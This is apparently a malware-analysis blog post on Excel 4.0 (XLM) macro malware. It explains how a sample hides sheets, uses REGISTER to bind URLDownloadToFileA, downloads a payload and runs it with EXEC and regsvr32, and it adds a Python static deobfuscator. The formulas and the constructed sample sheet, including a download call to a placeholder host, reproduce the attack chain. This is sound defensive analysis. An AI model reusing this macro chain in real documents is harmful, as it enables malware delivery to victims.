Excel 4.0 Macro Malware — old feature but can be harmful

Figure 1 — The “Enable Content” button tempts the victim to run the malicious Excel file
Figure 2 — Unhide option
Figure 3 — Unhide sheets
Figure 4
Figure 5 — The Auto_Open function

First stage

Figure 6 — The REGISTER function
URLMON = which DLL to load.
URLDownloadToFileA = which function to call from the chosen DLL.
D20 = "JJCCBB" (type string used to specify the data types when calling the API).
Drwrgdfghfhf = custom name (the function will later be called under this new name: "=Drwrgdfghfhf()").
D22 = 1 (Category).
D23 = 9 (Category).


Now we will see how the custom-named function “Drwrgdfghfhf” is used. The adversary downloads the malware from a malicious server over HTTP.

Figure 7 — Download a file
Drwrgdfghfhf = custom name of the REGISTER function that we saw in Figure 6.
Tiposa!E21 = "".
Tiposa1!G11 = random number between 213214234 (bottom) and 9776980793567560 (top), generated with the RANDBETWEEN() function.
Sheet2!K12 = ".dat".
Figure 8 — RANDBETWEEN function

The execution

The last part of the Excel 4.0 macro is the file execution. The malware uses the EXEC function to run the malicious OCX file through regsvr32.

Figure 9 — EXEC function
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")
E19 = T(E20&E21) = "regs"
E20 = "re"
E21 = "gs"
Once the cell references and the "&" concatenations are resolved, the command becomes:
=EXEC("regsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx")
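The REGISTER/download chain (Figures 6 and 7) and the EXEC chain (Figure 9) both hide what they do behind cell references, T() and "&" concatenation, so an analyst's first job is to fold those back into plain strings. The Python below is an added example, not code from the original post: it resolves such formulas over an in-memory sheet, then reports REGISTER, EXEC and RANDBETWEEN calls and any call to a name that REGISTER bound. The {cell: text} sheet model, the cell names C5/C6/K12, the URL placeholder and the reason strings are constructed for the demo; the function names, the "JJCCBB" type string, the 1/9 arguments, the RANDBETWEEN bounds and the regsvr32 command line are the ones the post shows. On a real workbook you would first extract the XLM formulas (for example with oletools' olevba) and feed them in as the sheet dictionary.

```python
import collections
import re

# Token classes of an XLM formula body (the text after "="); names that also match the cell pattern (e.g. LOG10) are out of scope here.
TOKEN_RE = re.compile(r'\s*(?:(?P<str>"(?:[^"]|"")*")|(?P<num>\d+)|(?P<cell>[A-Z]{1,3}\d+)'
                      r'|(?P<ident>[A-Za-z_]\w*)|(?P<op>[&(),]))')
Call = collections.namedtuple("Call", "name args")  # a call kept symbolic: side effects or unknown result

def tokenize(formula):
    tokens, pos, formula = [], 0, formula.strip()
    while pos < len(formula):
        m = TOKEN_RE.match(formula, pos)
        if not m:
            raise ValueError(f"cannot tokenize {formula[pos:]!r}")
        pos = m.end()
        tokens.append((m.lastgroup, m.group(m.lastgroup)))
    return tokens + [("end", "")]

def render(value, quote=False):
    """Text form of a resolved value; quote=True spells strings as Excel literals."""
    if isinstance(value, Call):
        return f"{value.name}({','.join(render(a, True) for a in value.args)})"
    if isinstance(value, str):
        return '"' + value.replace('"', '""') + '"' if quote else value
    return "" if value is None else str(value)

class Evaluator:
    """Resolves a {cell: text} sheet: '=...' is a formula, a double-quoted entry a string literal, else raw text."""
    def __init__(self, sheet):
        self.sheet, self.cache, self.stack, self.seen = sheet, {}, [], []
    def cell(self, ref):
        if ref not in self.cache:
            raw = self.sheet.get(ref, "")
            self.stack.append(ref)                  # calls met while resolving are attributed to ref
            if raw.startswith("="):
                self.cache[ref] = self.formula(raw[1:])
            else:
                self.cache[ref] = raw[1:-1].replace('""', '"') if raw.startswith('"') else raw
            self.stack.pop()
        return self.cache[ref]
    def call(self, name, args):
        if name.upper() == "T":                     # T(x) is x when x is text, else ""
            return args[0] if args and isinstance(args[0], str) else ""
        self.seen.append((self.stack[-1], Call(name, args)))
        return self.seen[-1][1]
    def formula(self, text):
        # Recursive descent: expr := term ('&' term)* ; term := str | num | cell | ident '(' args ')'
        toks, pos = tokenize(text), [0]             # pos: cursor shared by the closures below
        def take(*ops):                             # ops: operator characters accepted here
            tok = toks[pos[0]]
            if tok[0] == "end" or (ops and tok not in {("op", o) for o in ops}):
                raise ValueError(f"unexpected token {tok} in {text!r}")
            pos[0] += 1
            return tok
        def expr():
            value = term()
            while toks[pos[0]] == ("op", "&"):      # '&' is Excel's text concatenation
                take("&")
                value = render(value) + render(term())
            return value
        def term():
            kind, tok = take()
            if kind == "str":
                return tok[1:-1].replace('""', '"')
            if kind == "num":
                return int(tok)
            if kind == "cell":
                return self.cell(tok)
            if kind != "ident":
                raise ValueError(f"unexpected token {tok!r} in {text!r}")
            take("(")
            args = []
            while toks[pos[0]] != ("op", ")"):      # an empty slot is an omitted argument
                args.append(None if toks[pos[0]] == ("op", ",") else expr())
                if toks[pos[0]] != ("op", ")"):
                    take(",")
            take(")")
            return self.call(tok, args)
        return expr()

# Constructed sheet mirroring the post's chain: REGISTER binds URLDownloadToFileA to "Drwrgdfghfhf", a randomly named .dat is fetched, EXEC runs regsvr32.
SAMPLE_SHEET = {
    "E20": '"re"', "E21": '"gs"', "E19": "=T(E20&E21)", "K12": '".dat"',
    "C5": '=REGISTER("URLMON","URLDownloadToFileA","JJCCBB","Drwrgdfghfhf",,1,9)',
    "C6": '=Drwrgdfghfhf("http://placeholder.invalid/p","C:\\ProgramData\\"&RANDBETWEEN(213214234,9776980793567560)&K12,0,0)',
    "C7": '=EXEC(E19&"vr32 C"&":\\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\\VDscytujyctfjkvu1.ocx")',
}
SUSPICIOUS = {"REGISTER": "binds a DLL export to a sheet-level name", "EXEC": "runs an external command",
              "RANDBETWEEN": "random value, used here to build the drop-file name"}

def analyse(sheet):
    """Return ({cell: resolved formula}, [(cell, reason, resolved call)]) for one sheet."""
    ev = Evaluator(sheet)
    resolved = {ref: render(ev.cell(ref), True) for ref, raw in sheet.items() if raw.startswith("=")}
    # Names bound by REGISTER(dll, export, types, alias, ...) are callable like built-ins.
    aliases = {str(c.args[3]).upper(): f"calls REGISTERed alias of {c.args[0]}!{c.args[1]}"
               for _, c in ev.seen if c.name.upper() == "REGISTER" and len(c.args) > 3}
    findings = [(ref, reason, render(c)) for ref, c in ev.seen
                if (reason := SUSPICIOUS.get(c.name.upper()) or aliases.get(c.name.upper()))]
    return resolved, findings
```

Calls with side effects or runtime-only results (REGISTER, EXEC, RANDBETWEEN, the registered alias) are kept symbolic rather than executed, which is the point of static resolution: C7 folds to EXEC("regsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx") without ever running anything, and C6 is reported as a call through the name REGISTER bound to URLMON!URLDownloadToFileA even though "Drwrgdfghfhf" matches no known function.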


Excel 4.0 macros (XLM macros) are an old feature that Microsoft introduced in 1992. This technique is another way to execute malicious code through an Office document. Beware: VBA is not the only macro code that can compromise your machine.


